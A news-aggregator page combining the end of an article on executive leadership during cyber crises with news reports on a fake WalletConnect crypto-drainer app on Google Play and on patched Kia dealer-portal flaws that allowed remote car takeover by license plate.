Organizations must maintain constant communication with each line of business throughout the crisis because it empowers employees to make the micro-decisions necessary to limit the ongoing business and reputational harm. There is no better example of this than former Maersk CEO Soren Skou, whose tip-of-the-spear leadership helped the company navigate the unprecedented 2017 NotPetya malware attack. Skou participated in all crisis calls and meetings, focused on internal and external communication, and instructed all frontline staff across the 130 countries Maersk operates in to "do what you think is right to serve the customer — don't wait for the HQ, we'll accept the cost." In doing so, Maersk quickly mobilized to identify and remove the malware from its systems to restore operations, provided real-time feedback to its stakeholders about the situation, and resumed online books just eight days after the attack.

**Built-in Alternatives**

Each decision made during a crisis can set off a chain reaction that can compound damage. Business and security leaders often experience a rush of cortisol during the first few hours of a crisis that induces the "fog of war" feeling, clouding judgment and causing mistakes. It is important to understand during these moments that each choice has multiple options, leaders must ask the right information-gathering questions to support a full business response, and there is no perfect answer or solution. 

Redundancy is a key strategy to save time during a crisis, and the most mature organizations have created a collaborative response plan based on the PACE model. For instance, if an organization suffers a ransomware attack and its communications platforms are potentially compromised, moving to an alternate platform quickly removes a significant amount of risk. Teams should be aligned on how much risk they are willing to take with each decision and create a coordinated understanding of their options. By working through the pros and cons associated with these choices, executives and board members can determine which decisions their organizations should make to get operations back up and running as quickly and efficiently as possible.

**Driving a Culture of Preparedness**

Organizations that have dedicated the necessary time to preparing their teams for a crisis have confidence in their employees to successfully execute the incident response plan and limit the amount of damage inflicted by a threat actor. Testing each level of these plans, especially the "small details," is critical for successful execution of the organization's strategy. It allows leadership to adapt their playbooks and runbooks to various situations and circumstances, and evolve their pre-crisis plans to account for emerging threats and their effects on the business.

Conducting tabletop exercises, creating and testing playbooks and runbooks, and putting employees through real-life simulations during war games fosters a well-coordinated response and puts teams in the best position for when (not if) a situation arises. These operations can reveal potential gaps and answer questions that include: How is the company communicating to its employees when the email platform is compromised? Who is managing that list of employees and their corresponding contact information? Where is that document stored and when was it last updated? The responses to these questions are a direct correlation to a company's maturity and preparation.

When a corporation finds itself in the middle of a cyber crisis, the key stakeholders will shift their focus to the executive leadership team to determine how well they are responding. During these times, it is imperative for executives and board members to understand who their top allies are, and how to best leverage them to successfully navigate the situation and minimize the financial and reputational harm caused by the breach.

**About the Author**

Director, Executive & Board Cyber Services, Sygnia

Chris Crummey is the Director for Executive and Board Cyber Services globally at Sygnia. For the past eight years, Chris has prepared and advised thousands of companies, SOCs, executives and Boards of Directors on cybersecurity best practices before, during and after a cybersecurity crisis. These best practices focus on the intersection of cybersecurity, risk-based decision making, crisis communications, leadership under pressure and the role human beings play in cybersecurity. As a keynote speaker on these topics, Chris is also a cybersecurity faculty member of “Competent Boards,” which is the original and premier creator of online of ESG training programs for board directors and senior business professionals. Prior to this role, Chris was the Executive Director for the IBM’s X-Force Command Centers globally and specialized in tabletop exercises and cyber wargames.

Top Allies Executives &amp; Boards Should Leverage During a Cyber Crisis

A malicious app disguised as a legitimate WalletConnect tool targeted mobile users on Google Play. The app stole…

A malicious app disguised as a legitimate WalletConnect tool targeted mobile users on Google Play. The app stole crypto assets from unsuspecting victims. Learn how to protect yourself from similar scams.

Check Point Research (CPR) has discovered the first-ever mobile crypto drainer app on Google Play, deceptively posing as the legitimate WalletConnect tool. The app targeted users directly on their mobile devices, stealing around $70,000 from at least 150 victims. This marks the first time a drainer has exclusively targeted mobile device users, using advanced social engineering tactics and sophisticated evasion techniques.

The fake crypto drainer and wallet app (Screenshot: CPR)

This app capitalized on the trusted name “WalletConnect,” a well-known protocol for connecting wallets to Decentralized Applications (dApps). By appearing as a genuine WalletConnect solution, it lured users who were struggling to connect their wallets to Web3 applications using traditional methods into installing it.

Once installed, the app would prompt users to connect their wallets. This seemingly harmless request was a trap. Upon connection, the app would silently activate the MS Drainer, a powerful toolkit designed to steal various crypto assets.

The MS Drainer would then scan the victim’s wallet for valuable assets like tokens and NFTs. It would prioritize stealing the most valuable ones, using clever techniques to minimize fees and avoid detection. The app also employed deceptive tactics to trick users into signing transactions that would grant the attacker permission to withdraw funds.

These transactions appeared legitimate, leading many victims to unknowingly compromise their assets. This process is repeated across multiple blockchain networks, allowing attackers to systematically steal victims’ assets.

The malicious WalletConnect app used advanced social engineering and technical manipulation, exploiting the complexities of the legitimate WalletConnect protocol, to deceive users into thinking it was a safe tool for connecting their cryptocurrency wallets to Web3 applications.

According to Check Point’s detailed technical report shared with Hackread.com ahead of publishing on Thursday, the app also used advanced evasion techniques, such as fake positive reviews, to remain undetected on Google Play’s verification process for nearly five months, causing significant damage. It managed to accumulate over 10,000 downloads and received numerous fake positive reviews, further deceiving potential victims.

Fake reviews (Screenshot: CPR)

This indicates the growing sophistication of cybercriminals in the decentralized finance ecosystem. Crypto drainers, which steal digital assets, are increasingly used by attackers, often using phishing websites and apps that mimic legitimate platforms. This case highlights the importance of user awareness and security in the DeFi space, reminding us yet again that even seemingly legitimate apps can harbour malicious intent.

Commenting on this, Alexander Chailytko, Cyber Security, Research & Innovation Manager at Check Point Software warned Android users to watch out before downloading an app from third-party as well as Google’s very own Google Play or Play Store.

“This incident is a wake-up call for the entire digital asset community as the emergence of the first mobile crypto drainer app on Google Play marks a significant escalation in the tactics used by cybercriminals and the rapidly evolving landscape of cyber threats in decentralized finance,” Alexander explained.

“This research highlights the critical need for advanced, AI-driven security solutions that can detect and prevent such sophisticated threats. Both users and developers must stay informed and take proactive measures to secure their digital assets.”

1.  Trezor Data Breach Exposes Email and Names of 66,000 Users
2.  Pink Drainer Posed as Journalists, Stole $3M from Twitter Users
3.  Hackers Posed as Google Support to Steal $243 Million in Crypto
4.  Apple Approves Fake App Before Real Rabby Wallet, Funds Stolen
5.  Inferno Drainer Phishing Nets Scammers $80M from Crypto Wallets

First Mobile Crypto Drainer on Google Play Steals $70K from Users

A critical vulnerability in Kia vehicles allowed hackers to control cars remotely using only license plates. The flaw…

A critical vulnerability in Kia vehicles allowed hackers to control cars remotely using only license plates. The flaw has been patched, but it highlights the growing threat of cyberattacks on connected cars.

A severe security vulnerability has been discovered in Kia vehicles, allowing hackers to remotely control key functions using only a license plate. Security researchers Neiko Rivera, Sam Curry, Justin Rhinehart, and Ian Carroll uncovered a set of vulnerabilities that could have been exploited to gain unauthorized access to Kia vehicles by exploiting the Kia dealership infrastructure,

The attack involved attackers remotely registering for a fake account and generating access tokens. These tokens would then be used in conjunction with another HTTP request to a dealer APIGW (API Gateway) endpoint and the vehicle’s VIN (vehicle identification number) to obtain the owner’s name, phone number, and email address, potentially adding themselves as an “invisible” second user on the car without the owner’s knowledge.

Researchers discovered that a victim’s vehicle could be accessed by executing four HTTP requests and internet-to-vehicle commands. These commands include generating a dealer token, fetching the victim’s email and phone number, modifying the owner’s previous access using a leaked email address and VIN, and adding an attacker as the primary owner of the vehicle. The victim would not receive any notification about modifications to their access permissions. Here’s a quick explanation of which functionalities are vulnerable:

*   **Remote Lock/Unlock: They could lock or unlock the doors.**
*   **Geolocate Vehicle: Hackers could pinpoint the car’s location.**
*   **Remote Start/Stop: They could start or turn off the engine remotely.**
*   **Remote Horn/Light: They could activate the car’s horn and lights.**
*   **Remote Camera: In some cases, they could even access the car’s cameras.**

A hypothetical attack scenario could allow a bad actor to enter a Kia vehicle’s license plate, retrieve the victim’s information, and execute commands after 30 seconds. The vulnerability allows hackers to remotely start or stop the engine, potentially stealing the vehicle, causing damage, or endangering occupants. It impacted a wide range of Kia vehicles, including models manufactured after 2013. This means that a significant number of cars were potentially at risk.

Kia addressed these issues in August 2024 following a responsible disclosure in July 2024. While no evidence of exploitation in the wild exists, researchers warn that car manufacturers could introduce similar vulnerabilities to Meta, allowing someone to take over a vehicle’s information. As cars become increasingly connected, manufacturers must prioritize security measures to protect their customers from potential threats.

This is not the first time a team involving ethical hackers like Sam Curry has compromised the security of internet-connected cars for good. In December 2022, hackers used application vulnerabilities to hack Honda and Nissa vehicles just by knowing their VIN.

Commenting on this, Akhil Mittal, senior security consulting manager at the Synopsys Software Integrity Group, said, “This Kia vulnerability isn’t just a technical flaw—it’s a red flag for the entire automotive industry. It shows how modern cars have become prime targets for cybercriminals, shifting from physical theft to digital exploitation. The idea that a hacker could unlock, track, or even start your car using just a license plate number sounds like science fiction, but it’s happening today.”

Akhil further explained that “Kia’s quick patch is encouraging, but it raises a bigger question: Is the auto industry ready for these high-tech threats? This wasn’t just about controlling a car—it exposed personal data, too. In a few simple steps, a hacker could access sensitive information, change ownership, and take control of the vehicle without the owner’s knowledge. With nearly all Kia models made after 2013 affected, it’s clear that modern cars are now connected devices and vulnerable to the same cybersecurity risks as our phones and computers.”

“Automakers must take cybersecurity as seriously as crash safety. Cars aren’t just machines anymore—they are smart devices loaded with data that needs protection. Regular software updates, stronger encryption, and better communication with drivers are critical. If the industry doesn’t act soon, these risks could become problems for everyday drivers,” he warned.

1.  How Hackers Can Remotely Unlock/Start Honda Cars
2.  Cybercriminals Exploit CAN Injection Hack to Steal Cars
3.  Globally Used Points.com Loyalty System Hacked for Good
4.  Tesla cars can be remotely hacked using drone, WIFI dongle
5.  Internet Connected Car Hacked and DDoSed via Smartphone

Hackers Could Remotely Control Kia Cars by Exploiting License Plates

Researchers found a method to remotely take over any Kia with only the license plate number as a starting point.

In June of 2024 security researchers uncovered a set of vulnerabilities in the Kia dealer portal that allowed them to remotely take over any Kia vehicle built after 2013—and all they needed was a license plate number.

According to the researchers:

> “These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription.”

How was this possible?

First, it’s important to understand that the Kia “dealer portal” is where authorized Kia dealers can match customer accounts with the VIN number of their new car. For the customer accounts, Kia would ask the buyer for their email address at the dealership and send a registration link to that address where the customer could either set up a new Kia account or add their newly purchased vehicle to an existing Kia account.

The researchers found out that by sending a specially crafted request they could create a dealer account for themselves. After some more manipulation they were able to access all dealer endpoints which gave them access to customer data like names, phone numbers, and email addresses.

As the new “dealer,” the security researchers were also able to search by Vehicle Identification Number (VIN) number, which is a unique identifier for a vehicle. With the VIN number and the email address of the rightful owner, the researchers were able to demote the owner of the vehicle so that they could add themselves as the primary account holders.

Unfortunately, the rightful owner would not receive any notification that their vehicle had been accessed nor their access permissions modified.

But to find the VIN number of a car you’ll need physical access to the vehicle, right? Not entirely.

In several countries, including the US and the UK, there are vehicle databases that you can query to provide you with a VIN number based on the license plate number. The researchers used a third-party API to convert the license plate number to a VIN.

Depending on the vehicle and whether Kia Connect was active, the primary account holder is able to remotely lock/unlock, start/stop, honk, and locate the vehicle.

The researchers created a proof-of-concept tool where they could enter the license plate and in two steps they could retrieve the owner’s personal information, and then execute remote commands on the vehicle.

Demonstration tool created by the researchers

The researchers responsibly disclosed their findings to Kia, which has since remediated the vulnerabilities found by the researchers. Kia assured that the vulnerabilities have not been exploited maliciously.

Vulnerabilities in cars are not new. In fact, the researchers that found these vulnerabilities did that as a follow-up to their earlier research. And too often we find that car makers are more interested in adding new features than securing their existing ones. So, we can expect that vulnerabilities like these will continue to be uncovered and we should be glad that these researchers chose to disclose their findings and give Kia a chance to fix the vulnerabilities before disclosing them.

Latest News